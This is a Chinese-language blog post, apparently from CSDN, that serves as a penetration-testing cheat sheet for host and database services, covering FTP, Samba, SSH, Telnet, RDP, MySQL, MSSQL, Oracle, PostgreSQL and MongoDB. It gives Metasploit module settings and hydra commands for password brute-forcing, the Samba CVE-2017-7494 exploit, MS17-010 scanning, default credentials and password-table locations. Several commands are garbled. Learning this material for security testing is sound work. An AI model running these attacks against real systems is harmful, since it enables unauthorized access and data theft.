主机与数据库安全

最新推荐文章于 2024-05-19 20:00:00 发布
最新推荐文章于 2024-05-19 20:00:00 发布
阅读量170 收藏
点赞数
文章标签: 服务器 网络 linux 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75056154/article/details/129921303
版权

主机与数据库安全

主机共享端口及漏洞利用/检测

FTP服务

端口: 21
  FTP是File Transfer Protocol (文议) 的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是件传输协一个应用程序( Application )。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一-种协议以传输文件。

直接访问ftp://xx.xx.xxxx

FTP暴力破解

ftp的爆破工具有很多,常见的暴力破解工具有hydra、medusa 超级弱口令爆破工具等,推荐使用msf中的ftp模块、超级弱口令爆破工具

use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.109.134
set USER_ FILE /home/dic/dic_username_ ftp.txt
set PASS_ FILE /home/dic/dic_ password_ ftp.txt
set THREADS 30
run

Samba概述

默认端口: 137、135、139、 445等
  Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成Samba服务:对于这个可以在windows与Linux之间进行共享文件的服务同样是我们攻击的关注点; samba登录分为两种方式,一种是需要用户名口令; 另- -种是不需要用户名口令。在很多时候不光是pc机,还有一-些服务器, 网络设备都开放着此服务,方便进行文件共享,但是同时也给攻击者提供了便利。

默认端口: 445
  SMB(Server Message Block) Windows协议族,用于文件和打印共享服务。

Samba暴力破解

msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)

msf auxiliary(smb_ login) > show options (查看选项)

msf auxiliary(smb_ login) > set RHOSTS 10.180.100.10 (目标)

msf auxiliary(ssmb_ login) > set USER_ FILE /root/username.txt (用户名字典,或指定用户)

msf auxiliary(ssmb_ login) > set PASS_ _FILE /root/pass.txt (密码字典文件)

msf auxiliary(ssmb_ login) > exploit (开始)

Samba远程代码执行漏洞(CVE-2017-7494 )

使用Msfploit攻击
exploit/linux/samba/is_ known_ pipename
set RHOST 192.168.109.134
exploit

Samba -ms17 -010检测

使用mestasploit检测
use auxiliary/scanner/smb/smb_ ms17_ 010
set rhosts 10.0.0.1-10.0.0.254
set rport 445
run

主机远程连接端口及漏洞利用/检测

SSH概述

默认端口: 22
  SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定; SSH 为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台一-包括HP-UX、Linux、 AlX、 Solaris. Digital UNIX、Irix, 以及其他平台,都可运行SSH.

SSH暴力破解

测试工具: hydra、 metasploit、 超级弱口令检查工具
以metasploit为例
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.254
set USER FILE /root/user.txt
set PASS FILE /root/words.txt
set THREADS 30
run

Telnet概述

默认端口: 23
  Telnet协议是TEP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。 它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台.上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。

Telnet暴力破解

检测工具:hydra、超级弱口令检查工具、mestaploit

Mestaploit使用

msf > use auxiliary/scanner/telnet/telnet_ login (使用teInet_ login模块)
msf auxiliary(telnet login) > show options (查看 选项)
msf auxiliary(telnet login) > set RHOSTS 10.180.100.141 ( 目标)
msf auxiliary(telnet login) > set USER_ FILE /root/username.txt (用户名字典,或指定用户)
msf auxiliary(telnet login) > set PASS_ FILE /root/pass.txt (密码字典文件)
msf auxiliary(telnet_ login) > exploit (开始)

RDP概述

默认端口: 3389
  远程桌面协议(RDP)是一-个多 通道(multi-channel)的协议,让使用者(所在计算机称为用户端或本地计算机’)连上提供微软终端机服务的计算机(称为服务端或远程计算机")。

RDP暴力破解

工具: hydra: 超级弱口令爆破工具
hydra ip rdp -| administrator -P pass.txt -V

数据库服务端口及漏洞利用/检测

常见数据库连接工具

Navicat、phpMyAdmin、sqlyog、OBeaver

常见数据库密码存放位置

MySql(数据库名)——>mysql.user(密码存放位置)——>root/[空] (默认用户名/密码)

SQL Server(数据库名)——>sys.syslnklgns(密码存放位置)——>sa/ sa默认用户名/密码)

Oracle(数据库名)——>sys.dba_users(密码存放位置)——>internal / oracle | system /manager(默认用户名/密码)

Postgresql(数据库名)——>Postgresql.pg_shadow(密码存放位置)——>postgresql / [空]默认用户名/密码)

数据库的特性差异

MSSQL   sa  1433  Windows  高权限

MySQL  root  3306  Windows/Linux  低权限

Oracle  sys/system  1521  Windows/Linux  高权限

Mysql暴力破解

默认端口: 3306
  MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,属于Oracle旗下产品。
  MySQL是一种关系型数据库管理系统, 关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。

工具: hydra. 超级弱口令爆破工具、mestasploit
hydra ip mysql -| administrator -P pass.txt -V

mestasploit
msf > use auxiliary/scanner/mysql/mysql_login ( 使用mysql_login模块)
msf auxiliary(mysql _ogin) > show options (查看选项)
msf auxiliary(mysql_login) > set RHOSTS 192.168.230.176(目标)
msf auxiliary(mysql_login) > set USERNAME root (指定用户)
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt (密码字典文件)
msf auxiliary(mysql_login) > exploit (开始)

MSSQL(sqIserver)-暴力破解

默认端口: 1433
  MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台, 提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是-个数据库管理系统,用于建立、使用和维护数据库

工具: hydra、 超级弱口令爆破工具、metasploit

Metasploit爆破Oracle SID

Oracle爆破前得需要获取到目标的SID才可以进入下一步爆破的步骤
msf6 > use auxiliary/scanner/oracle/sid brute
msf6 auxiliary(scanner/oracle/sid brute) > set rhosts 10.20.24.244
msf6 auxiliary(scanner/oracle/sid brute) > set threads 10
msf6 auxiliary(scanner/oracle/sid brute) > run

拿到Oracle的SID后就可以开始对Oracle进行口令爆破了
msf6 > use auxiliary/scanner/oracle/oracle. login
msf6 auxiliary(scanner/oracle/oracle login) > set rhosts 10.20.24.244
msf6 auxiliary(scanner/oracle/oracle login) > set rports 1521
msf6 auxiliary(scanner/oracle/oracle. login) > set sid helowin
msf6 auxiliary(scanner/oracle/oracle login) > set threads 10
msf6 auxiliary(scanner/oracle/oracle. login) > run

Postgresql-暴力破解

默认端口: 5432
  PostgreSQL是一种特性非常齐全的自由软件的对象 关系型数据库管理系统(ORDBMS) , 是以加州大学计算机系开发的POSTGRES, 4.2版本为基础的对象关系型数据库管理系统。

测试工具: hydra. 超级弱口令爆破工具、metasploit

mongodb-未授权访问

默认端口: 27017
  MongoDB是-个基于分布式文件存储的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性
能数据存储解决方案。
  MongoDB是一个介于关系数据库和非关系数据库之间的产品, 是非关系数据库当中功能最丰富,最像关系数据库的。
  MongoDB默认端口27017,当配置成无验证时,存在未授权访问,使用msf中的scanner/mongodb/mongodb_ login模块进行测试,使用navicat连接获取数据库中的内容。

检测
use auxiliary/scanner/mongodb/mongodb_login
set rhosts 192.168.90.0/24
set threads 10
exploit

m0_75056154
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Oracle主机数据库安全检查流程
02-26
Oracle主机数据库安全检查流程,主机安全配置,服务器安全配置等模板
保护你的Sqlite数据库(SQLite数据库安全秘籍)
09-11
相信使用PHP开发的人员一定不会对SQLite感到陌生了,PHP5已经集成了这个轻量型的数据库。并且很多虚拟主机无论是win还是*nux都支持它。
主机数据库安全配置.pptx
09-30
主机数据库安全配置.pptx
数据库安全规范
03-22
数据库安全包含传统的备份与恢复,用户认证与访问控制,数据存贮和通信环节的加密,而且它作为操作系统之上的应用平台,其安全与网络主机安全息息相关。本文对公司办公网系统的数据库系统,加固进行指导。
主机数据库安全配置与加固措施概述.pptx
09-30
主机数据库安全配置与加固措施概述.pptx
Linux day6 yum下载,systemctl,
m0_56487684的博客
05-15 264
yum [-y] install wget 通过yum下载wget小工具。yum remove wget 也可以通过这种方式卸载wget。-y的意思是,如果有询问,自动确认(总是允许)。
登录接口取到token,加到请求头中,通过服务器验证#Vue3
weixin_45356258的博客
05-15 330
3.客户端收到 Token 以后可以把它存储起来,比如放在 Cookie 里或者 Local Storage 里。5.服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据。2.验证成功后,服务端会签发一个 Token,再把这个 Token 发送给客户端。4.客户端每次向服务端请求资源的时候需要带着服务端签发的 Token。1.服务端收到请求,去验证用户名与密码。
linux查看网卡信息
beck_li的博客
05-18 231
1、 查看网卡硬件信息 2、 查看系统的所有网络接口 3、 查看某个网络接口的详细信息,例如eth0的详细参数和指标 4、 查看所有网卡的链路状态 5、列出所有pci设备
物理服务器都有哪些作用?
wanhengwangluo的博客
05-18 614
物理服务器主要是由处理器、硬盘和系统总线等构成的,和普通的计算机相比,物理服务器因为需要提供更高的服务,所以物理服务器在各个方面的要求会高一些。物理服务器可以根据企业不同的自身需求来安装相应的配置,来满足企业各自的业务发展,物理服务器的架构和传统的计算机架构相似,有着十分稳定的硬件设施,一般不会造成网络拥堵和服务器死机的状况。物理服务器还有着大容量的内存,能够存储大量的数据文件,面对大量的用户请求也能轻巧应对,物理服务器的整体网络性能方面十分强大。
解释 RESTful API,以及如何使用它构建 web 应用程序
linsonggao的博客
05-15 846
它将资源和操作以标准的 HTTP 方法和 URI 进行了抽象,使得开发和使用 web 应用程序变得更加简单和可扩展。设计 API:根据资源的 CRUD 操作(创建、读取、更新、删除),设计 API 的端点和方法。例如,使用 GET 方法来获取资源,POST 方法来创建资源,PUT 方法来更新资源,DELETE 方法来删除资源。RESTful API(Representational State Transfer API)是一种基于 HTTP 协议的规范,用于设计和构建 web 应用程序的 API 接口。
美国服务器托管的优势
IDC_USA的博客
05-15 446
很多企业会选择美国服务器托管,那么美国服务器托管有哪些优势,rak部落为您整理美国服务器托管的优势。
(已解决)在服务器linux,centos)中调用R绘制图形之后保存报错,而在Windows中正常
c1007857613的专栏
05-19 14
服务器linux,centos)中调用R绘制图形之后保存报错,报错情况为:type = “cairo“ is unavailable. trying Xlib“,X11 is not available等。但是我在Windows的电脑上运行没有问题。
第八十二章 将 Web 应用程序与远程 Web 服务器结合使用 - 访问多个 IRIS 服务器上的 CSP
yaoxin521123的博客
05-16 478
应用程序,请阅读本节。本节使用管理门户作为示例应用程序。针对您自己的 Web 应用程序调整这些过程。管理门户应用程序通常使用以下格式的。配置名称的逗号分隔列表。这允许拥有多个配置名称而不是单个值。有关其他信息,请参阅《系统管理指南》中的定义远程服务器连接。服务器名称感到满意,请按照此过程操作。您将使用自己的服务器并替换名称。中,请按照本节中的过程创建替代名称。上的管理门户,请将服务器名称作为。服务器名称部分中的过程进行操作。服务器名称,请按照以下更改。服务器,请参阅将别名添加到。服务器上的一个或多个。
Linux文件系统和软硬链接
muyuteacher的博客
05-16 538
我们之前对文件的学习都是内存级别的,那么在文件没有被进程打开之前,这个文件是什么样的状态?本篇将站在磁盘的底层数据结构角度告诉你文件在磁盘中是如何存放的,以及磁盘的文件系统如何实现文件的创建、删除等操作,讲解磁盘文件系统具体的运行方式。
Liunx服务器
PYROMANIA
05-18 677
在工作中总会轮到你排查线上问题,当Liunx服务器中出现CPU占用率过高的情况,应该如何快速排查定位问题所在,提高工作效率呢?more记: 一次登录服务器发现CPU占用率居高不下, 排查后发现是MySQL占用达到200%
Linux下使用Qt + libpcap
贝勒里恩的博客
05-16 758
Libpcap是的英文缩写,即数据包捕获函数库。该库提供的C函数接口用于捕捉经过指定网络接口的数据包,该接口应该是被设为混杂模式。这个在原始套接子中有提到。著名的软件TCPDUMP就是在Libpcap的基础上开发而成的。Libpcap提供的接口函数实现和封装了与数据包截获有关的过程。Libpcap提供了用户级别的网络数据包捕获接口,并充分考虑到应用程序的可移植性。Libpcap可以在绝大多数Linux平台上运行。Wincap。它的工作在上层应用程序与网络接口之间。数据包捕获:捕获流经网卡的原始数据包。
2024年海外服务器怎么选?(外贸网站、个人博客用途)
weixin_43205316的博客
05-19 322
硅云专注做企业出海上云服务,在香港云服务器这一细分领域内具备较高的知名度,硅云的香港服务器配备了优质的网络线路(直连内地CN2、CMI+BGP网络),能够快速、有效地覆盖全球200多个国家和地区。作为全球领先的云服务提供商,AWS的海外服务器以其卓越的性能和安全性赢得了广泛赞誉。此外,AWS还具备强大的安全防护能力,通过多层次的安全措施保护用户数据的安全和隐私,AWS的香港服务器唯一不足是在国内的访问速度不佳,因为AWS不像硅云一样配备直连内地网络线路,所以AWS香港服务器在国内的访问速度不如硅云等厂商。
服务器出现故障该怎么办?
wanhengwangluo的博客
05-15 595
当用户在使用的过程中,服务器出现故障,比如蓝屏就意味着操作系统或者是硬件设施出现了严重的问题,蓝屏会导致服务器停止运行,会影响到服务器上托管的应用程序和服务的正常运行,所以当服务器出现这种情况时,需要采取一些有效的措施来进行解决问题,使服务器能够尽快正常工作。检查服务器硬件设备的连接情况,确保都是正常连接,没有松动的情况,对于积累的灰尘进行清理,防止因为积灰导致服务器散热不良,导致出现故障,使用自带的故障排除工具进行诊断系统故障。那当服务器出现故障后我们需要做出哪些有效措施呢?
【C#】使用HttpClient上传文件到网站服务器和解决出错问题
最新发布
TA远方
05-19 750
第一次使用HttpClient上传文件到网站服务器时,尤其是如果长时间未进行操作,使用Https加密传输协议可能会遇到一些错误。针对这些潜在的问题,以下是一些解决方案,以帮助您顺利上传文件
数据库安全性测试工具
01-30
以下是两种常用的数据库安全性测试工具: 1. SQLMap:SQLMap是一款自动化SQL注入和数据库接管工具。它可以扫描和检测Web应用程序中的SQL注入漏洞,并利用这些漏洞获取数据库访问权限。SQLMap支持多种数据库管理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值